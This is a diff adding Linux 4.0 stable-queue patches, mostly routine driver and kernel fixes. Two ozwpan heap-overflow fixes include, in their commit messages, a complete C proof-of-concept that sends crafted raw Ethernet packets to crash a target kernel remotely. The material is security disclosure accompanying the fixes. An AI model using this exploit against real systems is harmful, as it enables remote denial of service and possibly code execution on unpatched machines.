(a < 0) + return -1; + b = hex2num(*txt++); + if (b < 0) + return -1; + *addr++ = (a << 4) | b; + if (i < 5 && *txt++ != ':') + return -1; + } + return 0; +} + +int main(int argc, char *argv[]) +{ + if (argc < 3) { + fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); + return 1; + } + + uint8_t dest_mac[6]; + if (hwaddr_aton(argv[2], dest_mac)) { + fprintf(stderr, "Invalid mac address.\n"); + return 1; + } + + int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); + if (sockfd < 0) { + perror("socket"); + return 1; + } + + struct ifreq if_idx; + int interface_index; + strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); + if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { + perror("SIOCGIFINDEX"); + return 1; + } + interface_index = if_idx.ifr_ifindex; + if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { + perror("SIOCGIFHWADDR"); + return 1; + } + uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; + + struct { + struct ether_header ether_header; + struct oz_hdr oz_hdr; + struct oz_elt oz_elt; + struct oz_elt_connect_req oz_elt_connect_req; + } __packed connect_packet = { + .ether_header = { + .ether_type = htons(OZ_ETHERTYPE), + .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, + .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } + }, + .oz_hdr = { + .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), + .last_pkt_num = 0, + .pkt_num = htole32(0) + }, + .oz_elt = { + .type = OZ_ELT_CONNECT_REQ, + .length = sizeof(struct oz_elt_connect_req) + }, + .oz_elt_connect_req = { + .mode = 0, + .resv1 = {0}, + .pd_info = 0, + .session_id = 0, + .presleep = 35, + .ms_isoc_latency = 0, + .host_vendor = 0, + .keep_alive = 0, + .apps = htole16((1 << OZ_APPID_USB) | 0x1), + .max_len_div16 = 0, + .ms_per_isoc = 0, + .up_audio_buf = 0, + .ms_per_elt = 0 + } + }; + + struct { + struct ether_header ether_header; + struct oz_hdr oz_hdr; + struct oz_elt oz_elt; + struct oz_get_desc_rsp oz_get_desc_rsp; + } __packed pwn_packet = { + .ether_header = { + .ether_type = htons(OZ_ETHERTYPE), + .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, + .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } + }, + .oz_hdr = { + .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), + .last_pkt_num = 0, + .pkt_num = htole32(1) + }, + .oz_elt = { + .type = OZ_ELT_APP_DATA, + .length = sizeof(struct oz_get_desc_rsp) - 2 + }, + .oz_get_desc_rsp = { + .app_id = OZ_APPID_USB, + .elt_seq_num = 0, + .type = OZ_GET_DESC_RSP, + .req_id = 0, + .offset = htole16(0), + .total_size = htole16(0), + .rcode = 0, + .data = {0} + } + }; + + struct sockaddr_ll socket_address = { + .sll_ifindex = interface_index, + .sll_halen = ETH_ALEN, + .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } + }; + + if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { + perror("sendto"); + return 1; + } + usleep(300000); + if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { + perror("sendto"); + return 1; + } + return 0; +} + +Signed-off-by: Jason A. Donenfeld +Acked-by: Dan Carpenter +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/staging/ozwpan/ozusbsvc1.c | 13 +++++++++---- + 1 file changed, 9 insertions(+), 4 deletions(-) + +--- a/drivers/staging/ozwpan/ozusbsvc1.c ++++ b/drivers/staging/ozwpan/ozusbsvc1.c +@@ -390,10 +390,15 @@ void oz_usb_rx(struct oz_pd *pd, struct + case OZ_GET_DESC_RSP: { + struct oz_get_desc_rsp *body = + (struct oz_get_desc_rsp *)usb_hdr; +- int data_len = elt->length - +- sizeof(struct oz_get_desc_rsp) + 1; +- u16 offs = le16_to_cpu(get_unaligned(&body->offset)); +- u16 total_size = ++ u16 offs, total_size; ++ u8 data_len; ++ ++ if (elt->length < sizeof(struct oz_get_desc_rsp) - 1) ++ break; ++ data_len = elt->length - ++ (sizeof(struct oz_get_desc_rsp) - 1); ++ offs = le16_to_cpu(get_unaligned(&body->offset)); ++ total_size = + le16_to_cpu(get_unaligned(&body->total_size)); + oz_dbg(ON, "USB_REQ_GET_DESCRIPTOR - cnf\n"); + oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id, diff --git a/queue-4.0/ozwpan-use-unsigned-ints-to-prevent-heap-overflow.patch b/queue-4.0/ozwpan-use-unsigned-ints-to-prevent-heap-overflow.patch new file mode 100644 index 00000000000..ead07a44773 --- /dev/null +++ b/queue-4.0/ozwpan-use-unsigned-ints-to-prevent-heap-overflow.patch @@ -0,0 +1,230 @@ +From b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c Mon Sep 17 00:00:00 2001 +From: "Jason A. Donenfeld" +Date: Fri, 29 May 2015 13:06:59 +0200 +Subject: ozwpan: Use unsigned ints to prevent heap overflow + +From: "Jason A. Donenfeld" + +commit b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c upstream. + +Using signed integers, the subtraction between required_size and offset +could wind up being negative, resulting in a memcpy into a heap buffer +with a negative length, resulting in huge amounts of network-supplied +data being copied into the heap, which could potentially lead to remote +code execution.. This is remotely triggerable with a magic packet. +A PoC which obtains DoS follows below. It requires the ozprotocol.h file +from this module. + +=-=-=-=-=-= + + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + + #define u8 uint8_t + #define u16 uint16_t + #define u32 uint32_t + #define __packed __attribute__((__packed__)) + #include "ozprotocol.h" + +static int hex2num(char c) +{ + if (c >= '0' && c <= '9') + return c - '0'; + if (c >= 'a' && c <= 'f') + return c - 'a' + 10; + if (c >= 'A' && c <= 'F') + return c - 'A' + 10; + return -1; +} +static int hwaddr_aton(const char *txt, uint8_t *addr) +{ + int i; + for (i = 0; i < 6; i++) { + int a, b; + a = hex2num(*txt++); + if (a < 0) + return -1; + b = hex2num(*txt++); + if (b < 0) + return -1; + *addr++ = (a << 4) | b; + if (i < 5 && *txt++ != ':') + return -1; + } + return 0; +} + +int main(int argc, char *argv[]) +{ + if (argc < 3) { + fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); + return 1; + } + + uint8_t dest_mac[6]; + if (hwaddr_aton(argv[2], dest_mac)) { + fprintf(stderr, "Invalid mac address.\n"); + return 1; + } + + int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); + if (sockfd < 0) { + perror("socket"); + return 1; + } + + struct ifreq if_idx; + int interface_index; + strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); + if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { + perror("SIOCGIFINDEX"); + return 1; + } + interface_index = if_idx.ifr_ifindex; + if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { + perror("SIOCGIFHWADDR"); + return 1; + } + uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; + + struct { + struct ether_header ether_header; + struct oz_hdr oz_hdr; + struct oz_elt oz_elt; + struct oz_elt_connect_req oz_elt_connect_req; + } __packed connect_packet = { + .ether_header = { + .ether_type = htons(OZ_ETHERTYPE), + .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, + .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } + }, + .oz_hdr = { + .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), + .last_pkt_num = 0, + .pkt_num = htole32(0) + }, + .oz_elt = { + .type = OZ_ELT_CONNECT_REQ, + .length = sizeof(struct oz_elt_connect_req) + }, + .oz_elt_connect_req = { + .mode = 0, + .resv1 = {0}, + .pd_info = 0, + .session_id = 0, + .presleep = 35, + .ms_isoc_latency = 0, + .host_vendor = 0, + .keep_alive = 0, + .apps = htole16((1 << OZ_APPID_USB) | 0x1), + .max_len_div16 = 0, + .ms_per_isoc = 0, + .up_audio_buf = 0, + .ms_per_elt = 0 + } + }; + + struct { + struct ether_header ether_header; + struct oz_hdr oz_hdr; + struct oz_elt oz_elt; + struct oz_get_desc_rsp oz_get_desc_rsp; + } __packed pwn_packet = { + .ether_header = { + .ether_type = htons(OZ_ETHERTYPE), + .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, + .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } + }, + .oz_hdr = { + .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), + .last_pkt_num = 0, + .pkt_num = htole32(1) + }, + .oz_elt = { + .type = OZ_ELT_APP_DATA, + .length = sizeof(struct oz_get_desc_rsp) + }, + .oz_get_desc_rsp = { + .app_id = OZ_APPID_USB, + .elt_seq_num = 0, + .type = OZ_GET_DESC_RSP, + .req_id = 0, + .offset = htole16(2), + .total_size = htole16(1), + .rcode = 0, + .data = {0} + } + }; + + struct sockaddr_ll socket_address = { + .sll_ifindex = interface_index, + .sll_halen = ETH_ALEN, + .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } + }; + + if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { + perror("sendto"); + return 1; + } + usleep(300000); + if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { + perror("sendto"); + return 1; + } + return 0; +} + +Signed-off-by: Jason A. Donenfeld +Acked-by: Dan Carpenter +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/staging/ozwpan/ozhcd.c | 8 ++++---- + drivers/staging/ozwpan/ozusbif.h | 4 ++-- + 2 files changed, 6 insertions(+), 6 deletions(-) + +--- a/drivers/staging/ozwpan/ozhcd.c ++++ b/drivers/staging/ozwpan/ozhcd.c +@@ -743,8 +743,8 @@ void oz_hcd_pd_reset(void *hpd, void *hp + /* + * Context: softirq + */ +-void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc, +- int length, int offset, int total_size) ++void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status, const u8 *desc, ++ u8 length, u16 offset, u16 total_size) + { + struct oz_port *port = hport; + struct urb *urb; +@@ -756,8 +756,8 @@ void oz_hcd_get_desc_cnf(void *hport, u8 + if (!urb) + return; + if (status == 0) { +- int copy_len; +- int required_size = urb->transfer_buffer_length; ++ unsigned int copy_len; ++ unsigned int required_size = urb->transfer_buffer_length; + + if (required_size > total_size) + required_size = total_size; +--- a/drivers/staging/ozwpan/ozusbif.h ++++ b/drivers/staging/ozwpan/ozusbif.h +@@ -29,8 +29,8 @@ void oz_usb_request_heartbeat(void *hpd) + + /* Confirmation functions. + */ +-void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, +- const u8 *desc, int length, int offset, int total_size); ++void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status, ++ const u8 *desc, u8 length, u16 offset, u16 total_size); + void oz_hcd_control_cnf(void *hport, u8 req_id, u8 rcode, + const u8 *data, int data_len); + diff --git a/queue-4.0/pata_octeon_cf-fix-broken-build.patch b/queue-4.0/pata_octeon_cf-fix-broken-build.patch new file mode 100644 index 00000000000..e8e26e127c6 --- /dev/null +++ b/queue-4.0/pata_octeon_cf-fix-broken-build.patch @@ -0,0 +1,31 @@ +From 4710f2facb5c68d629015747bd09b37203e0d137 Mon Sep 17 00:00:00 2001 +From: Aaro Koskinen +Date: Mon, 8 Jun 2015 11:32:43 +0300 +Subject: pata_octeon_cf: fix broken build + +From: Aaro Koskinen + +commit 4710f2facb5c68d629015747bd09b37203e0d137 upstream. + +MODULE_DEVICE_TABLE is referring to wrong driver's table and breaks the +build. Fix that. + +Signed-off-by: Aaro Koskinen +Signed-off-by: Tejun Heo +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/ata/pata_octeon_cf.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/drivers/ata/pata_octeon_cf.c ++++ b/drivers/ata/pata_octeon_cf.c +@@ -1053,7 +1053,7 @@ static struct of_device_id octeon_cf_mat + }, + {}, + }; +-MODULE_DEVICE_TABLE(of, octeon_i2c_match); ++MODULE_DEVICE_TABLE(of, octeon_cf_match); + + static struct platform_driver octeon_cf_driver = { + .probe = octeon_cf_probe, diff --git a/queue-4.0/revert-bus-mvebu-mbus-make-sure-sdram-cs-for-dma-don-t-overlap-the-mbus-bridge-window.patch b/queue-4.0/revert-bus-mvebu-mbus-make-sure-sdram-cs-for-dma-don-t-overlap-the-mbus-bridge-window.patch new file mode 100644 index 00000000000..106ee652a35 --- /dev/null +++ b/queue-4.0/revert-bus-mvebu-mbus-make-sure-sdram-cs-for-dma-don-t-overlap-the-mbus-bridge-window.patch @@ -0,0 +1,199 @@ +From 885dbd154b2f2ee305cec6fd0a162e1a77ae2b06 Mon Sep 17 00:00:00 2001 +From: Thomas Petazzoni +Date: Thu, 28 May 2015 10:40:13 +0200 +Subject: Revert "bus: mvebu-mbus: make sure SDRAM CS for DMA don't overlap the MBus bridge window" + +From: Thomas Petazzoni + +commit 885dbd154b2f2ee305cec6fd0a162e1a77ae2b06 upstream. + +This reverts commit 1737cac69369 ("bus: mvebu-mbus: make sure SDRAM CS +for DMA don't overlap the MBus bridge window"), because it breaks DMA +on platforms having more than 2 GB of RAM. + +This commit changed the information reported to DMA masters device +drivers through the mv_mbus_dram_info() function so that the returned +DRAM ranges do not overlap with I/O windows. + +This was necessary as a preparation to support the new CESA Crypto +Engine driver, which will use DMA for cryptographic operations. But +since it does DMA with the SRAM which is mapped as an I/O window, +having DRAM ranges overlapping with I/O windows was problematic. + +To solve this, the above mentioned commit changed the mvebu-mbus to +adjust the DRAM ranges so that they don't overlap with the I/O +windows. However, by doing this, we re-adjust the DRAM ranges in a way +that makes them have a size that is no longer a power of two. While +this is perfectly fine for the Crypto Engine, which supports DRAM +ranges with a granularity of 64 KB, it breaks basically all other DMA +masters, which expect power of two sizes for the DRAM ranges. + +Due to this, if the installed system memory is 4 GB, in two +chip-selects of 2 GB, the second DRAM range will be reduced from 2 GB +to a little bit less than 2 GB to not overlap with the I/O windows, in +a way that results in a DRAM range that doesn't have a power of two +size. This means that whenever you do a DMA transfer with an address +located in the [ 2 GB ; 4 GB ] area, it will freeze the system. Any +serious DMA activity like simply running: + + for i in $(seq 1 64) ; do dd if=/dev/urandom of=file$i bs=1M count=16 ; done + +in an ext3 partition mounted over a SATA drive will freeze the system. + +Since the new CESA crypto driver that uses DMA has not been merged +yet, the easiest fix is to simply revert this commit. A follow-up +commit will introduce a different solution for the CESA crypto driver. + +Signed-off-by: Thomas Petazzoni +Fixes: 1737cac69369 ("bus: mvebu-mbus: make sure SDRAM CS for DMA don't overlap the MBus bridge window") +Signed-off-by: Gregory CLEMENT +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/bus/mvebu-mbus.c | 107 +++++++---------------------------------------- + 1 file changed, 17 insertions(+), 90 deletions(-) + +--- a/drivers/bus/mvebu-mbus.c ++++ b/drivers/bus/mvebu-mbus.c +@@ -58,7 +58,6 @@ + #include + #include + #include +-#include + + /* + * DDR target is the same on all platforms. +@@ -103,9 +102,7 @@ + + /* Relative to mbusbridge_base */ + #define MBUS_BRIDGE_CTRL_OFF 0x0 +-#define MBUS_BRIDGE_SIZE_MASK 0xffff0000 + #define MBUS_BRIDGE_BASE_OFF 0x4 +-#define MBUS_BRIDGE_BASE_MASK 0xffff0000 + + /* Maximum number of windows, for all known platforms */ + #define MBUS_WINS_MAX 20 +@@ -579,106 +576,36 @@ static unsigned int armada_xp_mbus_win_r + return MVEBU_MBUS_NO_REMAP; + } + +-/* +- * Use the memblock information to find the MBus bridge hole in the +- * physical address space. +- */ +-static void __init +-mvebu_mbus_find_bridge_hole(uint64_t *start, uint64_t *end) +-{ +- struct memblock_region *r; +- uint64_t s = 0; +- +- for_each_memblock(memory, r) { +- /* +- * This part of the memory is above 4 GB, so we don't +- * care for the MBus bridge hole. +- */ +- if (r->base >= 0x100000000) +- continue; +- +- /* +- * The MBus bridge hole is at the end of the RAM under +- * the 4 GB limit. +- */ +- if (r->base + r->size > s) +- s = r->base + r->size; +- } +- +- *start = s; +- *end = 0x100000000; +-} +- + static void __init + mvebu_mbus_default_setup_cpu_target(struct mvebu_mbus_state *mbus) + { + int i; + int cs; +- uint64_t mbus_bridge_base, mbus_bridge_end; + + mvebu_mbus_dram_info.mbus_dram_target_id = TARGET_DDR; + +- mvebu_mbus_find_bridge_hole(&mbus_bridge_base, &mbus_bridge_end); +- + for (i = 0, cs = 0; i < 4; i++) { +- u64 base = readl(mbus->sdramwins_base + DDR_BASE_CS_OFF(i)); +- u64 size = readl(mbus->sdramwins_base + DDR_SIZE_CS_OFF(i)); +- u64 end; +- struct mbus_dram_window *w; +- +- /* Ignore entries that are not enabled */ +- if (!(size & DDR_SIZE_ENABLED)) +- continue; +- +- /* +- * Ignore entries whose base address is above 2^32, +- * since devices cannot DMA to such high addresses +- */ +- if (base & DDR_BASE_CS_HIGH_MASK) +- continue; +- +- base = base & DDR_BASE_CS_LOW_MASK; +- size = (size | ~DDR_SIZE_MASK) + 1; +- end = base + size; +- +- /* +- * Adjust base/size of the current CS to make sure it +- * doesn't overlap with the MBus bridge hole. This is +- * particularly important for devices that do DMA from +- * DRAM to a SRAM mapped in a MBus window, such as the +- * CESA cryptographic engine. +- */ ++ u32 base = readl(mbus->sdramwins_base + DDR_BASE_CS_OFF(i)); ++ u32 size = readl(mbus->sdramwins_base + DDR_SIZE_CS_OFF(i)); + + /* +- * The CS is fully enclosed inside the MBus bridge +- * area, so ignore it. ++ * We only take care of entries for which the chip ++ * select is enabled, and that don't have high base ++ * address bits set (devices can only access the first ++ * 32 bits of the memory). + */ +- if (base >= mbus_bridge_base && end <= mbus_bridge_end) +- continue; +- +- /* +- * Beginning of CS overlaps with end of MBus, raise CS +- * base address, and shrink its size. +- */ +- if (base >= mbus_bridge_base && end > mbus_bridge_end) { +- size -= mbus_bridge_end - base; +- base = mbus_bridge_end; ++ if ((size & DDR_SIZE_ENABLED) && ++ !(base & DDR_BASE_CS_HIGH_MASK)) { ++ struct mbus_dram_window *w; ++ ++ w = &mvebu_mbus_dram_info.cs[cs++]; ++ w->cs_index = i; ++ w->mbus_attr = 0xf & ~(1 << i); ++ if (mbus->hw_io_coherency) ++ w->mbus_attr |= ATTR_HW_COHERENCY; ++ w->base = base & DDR_BASE_CS_LOW_MASK; ++ w->size = (size | ~DDR_SIZE_MASK) + 1; + } +- +- /* +- * End of CS overlaps with beginning of MBus, shrink +- * CS size. +- */ +- if (base < mbus_bridge_base && end > mbus_bridge_base) +- size -= end - mbus_bridge_base; +- +- w = &mvebu_mbus_dram_info.cs[cs++]; +- w->cs_index = i; +- w->mbus_attr = 0xf & ~(1 << i); +- if (mbus->hw_io_coherency) +- w->mbus_attr |= ATTR_HW_COHERENCY; +- w->base = base; +- w->size = size; + } + mvebu_mbus_dram_info.num_cs = cs; + } diff --git a/queue-4.0/revert-drm-radeon-adjust-pll-when-audio-is-not-enabled.patch b/queue-4.0/revert-drm-radeon-adjust-pll-when-audio-is-not-enabled.patch new file mode 100644 index 00000000000..b6eee34ed42 --- /dev/null +++ b/queue-4.0/revert-drm-radeon-adjust-pll-when-audio-is-not-enabled.patch @@ -0,0 +1,35 @@ +From ebb9bf18636926d5da97136c22e882c5d91fda73 Mon Sep 17 00:00:00 2001 +From: Alex Deucher +Date: Wed, 10 Jun 2015 01:30:54 -0400 +Subject: Revert "drm/radeon: adjust pll when audio is not enabled" + +From: Alex Deucher + +commit ebb9bf18636926d5da97136c22e882c5d91fda73 upstream. + +This reverts commit 7fe04d6fa824ccea704535a597dc417c8687f990. + +Fixes some systems at the expense of others. Need to properly +fix the pll divider selection. + +bug: +https://bugzilla.kernel.org/show_bug.cgi?id=99651 + +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/gpu/drm/radeon/atombios_crtc.c | 3 --- + 1 file changed, 3 deletions(-) + +--- a/drivers/gpu/drm/radeon/atombios_crtc.c ++++ b/drivers/gpu/drm/radeon/atombios_crtc.c +@@ -580,9 +580,6 @@ static u32 atombios_adjust_pll(struct dr + else + radeon_crtc->pll_flags |= RADEON_PLL_PREFER_LOW_REF_DIV; + +- /* if there is no audio, set MINM_OVER_MAXP */ +- if (!drm_detect_monitor_audio(radeon_connector_edid(connector))) +- radeon_crtc->pll_flags |= RADEON_PLL_PREFER_MINM_OVER_MAXP; + if (rdev->family < CHIP_RV770) + radeon_crtc->pll_flags |= RADEON_PLL_PREFER_MINM_OVER_MAXP; + /* use frac fb div on APUs */ diff --git a/queue-4.0/revert-drm-radeon-don-t-share-plls-if-monitors-differ-in-audio-support.patch b/queue-4.0/revert-drm-radeon-don-t-share-plls-if-monitors-differ-in-audio-support.patch new file mode 100644 index 00000000000..ca0a6f284a8 --- /dev/null +++ b/queue-4.0/revert-drm-radeon-don-t-share-plls-if-monitors-differ-in-audio-support.patch @@ -0,0 +1,36 @@ +From 6fb3c025fee16f11ebd73f84f5aba1ee9ce7f8c6 Mon Sep 17 00:00:00 2001 +From: Alex Deucher +Date: Wed, 10 Jun 2015 01:29:14 -0400 +Subject: Revert "drm/radeon: don't share plls if monitors differ in audio support" + +From: Alex Deucher + +commit 6fb3c025fee16f11ebd73f84f5aba1ee9ce7f8c6 upstream. + +This reverts commit a10f0df0615abb194968fc08147f3cdd70fd5aa5. + +Fixes some systems at the expense of others. Need to properly +fix the pll divider selection. + +bug: +https://bugzilla.kernel.org/show_bug.cgi?id=99651 + +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/gpu/drm/radeon/atombios_crtc.c | 4 +--- + 1 file changed, 1 insertion(+), 3 deletions(-) + +--- a/drivers/gpu/drm/radeon/atombios_crtc.c ++++ b/drivers/gpu/drm/radeon/atombios_crtc.c +@@ -1789,9 +1789,7 @@ static int radeon_get_shared_nondp_ppll( + if ((crtc->mode.clock == test_crtc->mode.clock) && + (adjusted_clock == test_adjusted_clock) && + (radeon_crtc->ss_enabled == test_radeon_crtc->ss_enabled) && +- (test_radeon_crtc->pll_id != ATOM_PPLL_INVALID) && +- (drm_detect_monitor_audio(radeon_connector_edid(test_radeon_crtc->connector)) == +- drm_detect_monitor_audio(radeon_connector_edid(radeon_crtc->connector)))) ++ (test_radeon_crtc->pll_id != ATOM_PPLL_INVALID)) + return test_radeon_crtc->pll_id; + } + } diff --git a/queue-4.0/ring-buffer-benchmark-fix-the-wrong-sched_priority-of-producer.patch b/queue-4.0/ring-buffer-benchmark-fix-the-wrong-sched_priority-of-producer.patch new file mode 100644 index 00000000000..cf9fefa540d --- /dev/null +++ b/queue-4.0/ring-buffer-benchmark-fix-the-wrong-sched_priority-of-producer.patch @@ -0,0 +1,33 @@ +From 108029323910c5dd1ef8fa2d10da1ce5fbce6e12 Mon Sep 17 00:00:00 2001 +From: Wang Long +Date: Wed, 10 Jun 2015 08:12:37 +0000 +Subject: ring-buffer-benchmark: Fix the wrong sched_priority of producer + +From: Wang Long + +commit 108029323910c5dd1ef8fa2d10da1ce5fbce6e12 upstream. + +The producer should be used producer_fifo as its sched_priority, +so correct it. + +Link: http://lkml.kernel.org/r/1433923957-67842-1-git-send-email-long.wanglong@huawei.com + +Signed-off-by: Wang Long +Signed-off-by: Steven Rostedt +Signed-off-by: Greg Kroah-Hartman + +--- + kernel/trace/ring_buffer_benchmark.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/kernel/trace/ring_buffer_benchmark.c ++++ b/kernel/trace/ring_buffer_benchmark.c +@@ -450,7 +450,7 @@ static int __init ring_buffer_benchmark_ + + if (producer_fifo >= 0) { + struct sched_param param = { +- .sched_priority = consumer_fifo ++ .sched_priority = producer_fifo + }; + sched_setscheduler(producer, SCHED_FIFO, ¶m); + } else diff --git a/queue-4.0/sched-numa-do-not-hint-for-numa-balancing-on-vm_mixedmap-mappings.patch b/queue-4.0/sched-numa-do-not-hint-for-numa-balancing-on-vm_mixedmap-mappings.patch new file mode 100644 index 00000000000..f76e91322dd --- /dev/null +++ b/queue-4.0/sched-numa-do-not-hint-for-numa-balancing-on-vm_mixedmap-mappings.patch @@ -0,0 +1,56 @@ +From 8e76d4eecf7afeec9328e21cd5880e281838d0d6 Mon Sep 17 00:00:00 2001 +From: Mel Gorman +Date: Wed, 10 Jun 2015 11:15:00 -0700 +Subject: sched, numa: do not hint for NUMA balancing on VM_MIXEDMAP mappings + +From: Mel Gorman + +commit 8e76d4eecf7afeec9328e21cd5880e281838d0d6 upstream. + +Jovi Zhangwei reported the following problem + + Below kernel vm bug can be triggered by tcpdump which mmaped a lot of pages + with GFP_COMP flag. + + [Mon May 25 05:29:33 2015] page:ffffea0015414000 count:66 mapcount:1 mapping: (null) index:0x0 + [Mon May 25 05:29:33 2015] flags: 0x20047580004000(head) + [Mon May 25 05:29:33 2015] page dumped because: VM_BUG_ON_PAGE(compound_order(page) && !PageTransHuge(page)) + [Mon May 25 05:29:33 2015] ------------[ cut here ]------------ + [Mon May 25 05:29:33 2015] kernel BUG at mm/migrate.c:1661! + [Mon May 25 05:29:33 2015] invalid opcode: 0000 [#1] SMP + +In this case it was triggered by running tcpdump but it's not necessary +reproducible on all systems. + + sudo tcpdump -i bond0.100 'tcp port 4242' -c 100000000000 -w 4242.pcap + +Compound pages cannot be migrated and it was not expected that such pages +be marked for NUMA balancing. This did not take into account that drivers +such as net/packet/af_packet.c may insert compound pages into userspace +with vm_insert_page. This patch tells the NUMA balancing protection +scanner to skip all VM_MIXEDMAP mappings which avoids the possibility that +compound pages are marked for migration. + +Signed-off-by: Mel Gorman +Reported-by: Jovi Zhangwei +Cc: Ingo Molnar +Cc: Peter Zijlstra +Signed-off-by: Andrew Morton +Signed-off-by: Linus Torvalds +Signed-off-by: Greg Kroah-Hartman + +--- + kernel/sched/fair.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/kernel/sched/fair.c ++++ b/kernel/sched/fair.c +@@ -2166,7 +2166,7 @@ void task_numa_work(struct callback_head + } + for (; vma; vma = vma->vm_next) { + if (!vma_migratable(vma) || !vma_policy_mof(vma) || +- is_vm_hugetlb_page(vma)) { ++ is_vm_hugetlb_page(vma) || (vma->vm_flags & VM_MIXEDMAP)) { + continue; + } + diff --git a/queue-4.0/serial-imx-fix-dma-handling-for-idle-condition-aborts.patch b/queue-4.0/serial-imx-fix-dma-handling-for-idle-condition-aborts.patch new file mode 100644 index 00000000000..bc5fd072ebc --- /dev/null +++ b/queue-4.0/serial-imx-fix-dma-handling-for-idle-condition-aborts.patch @@ -0,0 +1,45 @@ +From 392bceedb107a3dc1d4287e63d7670d08f702feb Mon Sep 17 00:00:00 2001 +From: Philipp Zabel +Date: Tue, 19 May 2015 10:54:09 +0200 +Subject: serial: imx: Fix DMA handling for IDLE condition aborts + +From: Philipp Zabel + +commit 392bceedb107a3dc1d4287e63d7670d08f702feb upstream. + +The driver configures the IDLE condition to interrupt the SDMA engine. +Since the SDMA UART ROM script doesn't clear the IDLE bit itself, this +caused repeated 1-byte DMA transfers, regardless of available data in the +RX FIFO. Also, when returning due to the IDLE condition, the UART ROM +script already increased its counter, causing residue to be off by one. + +This patch clears the IDLE condition to avoid repeated 1-byte DMA transfers +and decreases count by when the DMA transfer was aborted due to the IDLE +condition, fixing serial transfers using DMA on i.MX6Q. + +Reported-by: Peter Seiderer +Signed-off-by: Philipp Zabel +Tested-by: Fabio Estevam +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/tty/serial/imx.c | 8 ++++++++ + 1 file changed, 8 insertions(+) + +--- a/drivers/tty/serial/imx.c ++++ b/drivers/tty/serial/imx.c +@@ -959,6 +959,14 @@ static void dma_rx_callback(void *data) + + status = dmaengine_tx_status(chan, (dma_cookie_t)0, &state); + count = RX_BUF_SIZE - state.residue; ++ ++ if (readl(sport->port.membase + USR2) & USR2_IDLE) { ++ /* In condition [3] the SDMA counted up too early */ ++ count--; ++ ++ writel(USR2_IDLE, sport->port.membase + USR2); ++ } ++ + dev_dbg(sport->port.dev, "We get %d bytes.\n", count); + + if (count) { diff --git a/queue-4.0/series b/queue-4.0/series index 42353700a39..9556ce5f7fa 100644 --- a/queue-4.0/series +++ b/queue-4.0/series @@ -61,3 +61,36 @@ usb-dwc3-gadget-fix-incorrect-depcmd-and-dgcmd-status-macros.patch usb-host-xhci-add-mutex-for-non-thread-safe-data.patch usb-make-module-xhci_hcd-removable.patch x86-asm-irq-stop-relying-on-magic-jmp-behavior-for-early_idt_handlers.patch +ring-buffer-benchmark-fix-the-wrong-sched_priority-of-producer.patch +mips-ralink-fix-clearing-the-illegal-access-interrupt.patch +mips-fix-enabling-of-debug_stackoverflow.patch +mips-kvm-do-not-sign-extend-on-unsigned-mmio-load.patch +ozwpan-use-proper-check-to-prevent-heap-overflow.patch +ozwpan-use-unsigned-ints-to-prevent-heap-overflow.patch 